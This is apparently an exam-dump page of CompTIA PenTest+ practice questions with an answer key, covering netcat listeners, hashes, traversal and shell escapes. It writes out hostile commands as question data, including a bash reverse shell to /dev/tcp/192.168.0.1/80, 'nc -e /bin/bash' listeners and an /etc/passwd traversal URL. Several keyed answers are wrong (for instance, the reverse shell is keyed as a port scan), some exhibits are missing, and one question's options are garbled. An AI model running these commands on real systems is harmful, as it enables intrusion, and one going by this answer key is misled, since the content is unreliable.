Excellent PT0-001 Updated 2021 Dumps With 100% Exam Passing Guarantee
Best way to practice test for CompTIA PT0-001
NEW QUESTION 109
A system security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner working of these applications?
- A. Launch the applications and use dynamic software analysis tools, including fuzz testing
- B. Use a static code analyzer on the JAR filet to look for code Quality deficiencies
- C. Review the details and extensions of the certificate used to digitally sign the code and the application
- D. Decompile the applications to approximate source code and then conduct a manual review
Answer: A
NEW QUESTION 110
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
- A. nc -lp 4444 -e /bin/bash
- B. nc -vp 4444 /bin/bash
- C. nc -p 4444 /bin/bash
- D. nc -lvp 4444 /bin/bash
Answer: D
Explanation:
Reference:
https://netsec.ws/?p=292
NEW QUESTION 111
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
- A. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.
- B. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
- C. Identify the issues that can be remediated most quickly and address them first.
- D. Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
Answer: A
NEW QUESTION 112
If a security consultant comes across a password hash that resembles the following:
b117525b345470c29ca3d8ac0b556ba8
Which of the following formats is the correct hash type?
- A. SHA-1
- B. NTLM
- C. Kerberos
- D. NetNTLMv1
Answer: A
NEW QUESTION 113
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
- A. Performs a port scan.
- B. Redirects a TTY to a remote system.
- C. Grabs the web server's banner.
- D. Removes error logs for the supplied IP.
Answer: A
NEW QUESTION 114
Click the exhibit button.
Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)
- A. Arbitrary code execution
- B. Cross-site request forgery
- C. Session hijacking
- D. SQL injection
- E. Login credential brute-forcing
Answer: C,E
NEW QUESTION 115
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Answer:
Explanation:
NEW QUESTION 116
A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?
- A. -p ALL
- B. -port 1-65534
- C. -p-
- D. -p 1-65534
Answer: C
NEW QUESTION 117
Given the following:
http://example.com/download.php?id-.../.../.../etc/passwd
Which of the following BEST describes the above attack?
- A. Malicious file upload attack
- B. Directory traversal attack
- C. Redirect attack
- D. Insecure direct object reference attack
Answer: B
Explanation:
Explanation
NEW QUESTION 118
A penetration tester is reviewing the following output from a wireless sniffer:
Which of the following can be extrapolated from the above information?
- A. Hardware vendor
- B. Key strength
- C. Usernames
- D. Channel interference
Answer: C
NEW QUESTION 119
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in Question: within the last 30 minutes. Which of the following has MOST likely occurred?
- A. The employee lost the badge.
- B. The physical access control server is malfunctioning.
- C. The system reached the crossover error rate.
- D. The badge was cloned.
Answer: D
NEW QUESTION 120
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
- A. Identify the company's external facing webmail application, enumerate user accounts and attempt password guessing to gain access.
- B. Perform a vulnerability scan against the company's external netblock, identify exploitable vulnerabilities, and attempt to gain access.
- C. Use domain and IP registry websites to identify the company's external netblocks and external facing applications.
- D. Search social media for information technology employees who post information about the technologies they work with.
- E. Wait outside of the company's building and attempt to tailgate behind an employee.
Answer: A,D
NEW QUESTION 121
Which of the following excerpts would come from a corporate policy?
- A. Employees must use strong passwords for accessing corporate assets.
- B. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
- C. The corporate systems must store passwords using the MD5 hashing algorithm.
- D. The help desk can be reached at 800-passwd1 to perform password resets.
Answer: C
NEW QUESTION 122
After successfully exploiting a local file inclusion vulnerability within a web application a limited reverse shell is spawned back to the penetration tester's workstation Which of the following can be used to escape the limited shell and create a fully functioning TTY?
- A. php -r ,Sshell=f3hellopen("/bin/bash-);exec($9he:i)'
- B. python -c 'import pty;pcy.3pawn("/bin/bash")'
- C. bash -i >fi /dev/localhosc Oil
- D. per1 -e ' : set shall=/bin/bash:shell'
Answer: B
NEW QUESTION 123
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
- A. Technical summary
- B. Main body
- C. Executive summary
- D. Appendices
Answer: C
NEW QUESTION 124
......
CompTIA PenTest+ Certification Exam Certification Sample Questions and Practice Exam: https://www.exam4free.com/PT0-001-valid-dumps.html
